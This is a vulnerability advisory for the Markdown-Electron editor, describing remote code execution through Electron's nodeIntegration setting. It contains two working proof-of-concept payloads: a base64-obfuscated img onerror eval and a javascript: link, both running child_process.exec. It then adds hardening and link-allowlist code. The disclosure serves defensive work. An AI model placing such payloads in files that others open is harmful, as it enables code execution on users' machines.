Submit #92098: Incorrect electron configuration causes RCE

Title: Incorrect electron configuration causes RCE
Description: nodeIntegration: true decides that Node APIs are enabled in the renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open an unknown markdown file, it may cause remote code execution (RCE).

EXP

# 0 click
<img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'>

# 1 click
<a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a>

For more details, please click the announcement.
Source: https://github.com/JP1016/Markdown-Electron/issues/3
User: Tom23 (UID 41413)
Submission: 02/20/2023 13:17 (3 years ago)
Moderation: 02/24/2023 09:00 (4 days later)
Status: Accepted
VulDB entry: 221738 [JP1016 Markdown-Electron code injection]
Points: 20
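
Added example (not part of the submission and not Markdown-Electron code): the reported renderer setting next to a hardened one, a check that flags risky webPreferences, and a scheme allowlist for link targets in rendered Markdown. The helper names auditWebPreferences and isAllowedLink and the sample values are assumptions made for illustration; the option names are Electron's BrowserWindow webPreferences keys.

```javascript
// Added example, not Markdown-Electron code. Helper names are hypothetical;
// option names are Electron's BrowserWindow `webPreferences` keys.

// Constructed sample: the setting the report describes.
const reportedPrefs = { nodeIntegration: true };

// Hardened counterpart, passed as new BrowserWindow({ webPreferences: hardenedPrefs }).
const hardenedPrefs = {
  nodeIntegration: false,  // no require() in the renderer
  contextIsolation: true,  // preload scripts run in a separate JS context
  sandbox: true,           // renderer runs in the OS-level sandbox
  webSecurity: true,       // keep same-origin policy on
};

// Defaults differ between Electron releases, so an unset option is reported
// instead of being assumed safe.
function auditWebPreferences(prefs = {}) {
  const findings = [];
  for (const [key, want] of Object.entries(hardenedPrefs)) {
    if (!(key in prefs)) findings.push(`${key}: not set explicitly (want ${want})`);
    else if (prefs[key] !== want) findings.push(`${key}: ${prefs[key]} (want ${want})`);
  }
  return findings;
}

// Link targets allowed in rendered Markdown; everything else is dropped.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function isAllowedLink(href) {
  // Remove whitespace and control characters before looking at the scheme.
  const cleaned = String(href).replace(/[\u0000-\u0020]/g, '');
  let url;
  try {
    url = new URL(cleaned);
  } catch {
    // Not an absolute URL: accept only if it carries no scheme (relative link).
    return !/^[a-z][a-z0-9+.-]*:/i.test(cleaned);
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

console.log(auditWebPreferences(reportedPrefs));
console.log(isAllowedLink('javascript:alert(1)'), isAllowedLink('notes/readme.md'));
```

The link check covers href values only. Inline event handlers such as onerror in rendered HTML still have to be removed by an HTML sanitizer or blocked by a Content-Security-Policy.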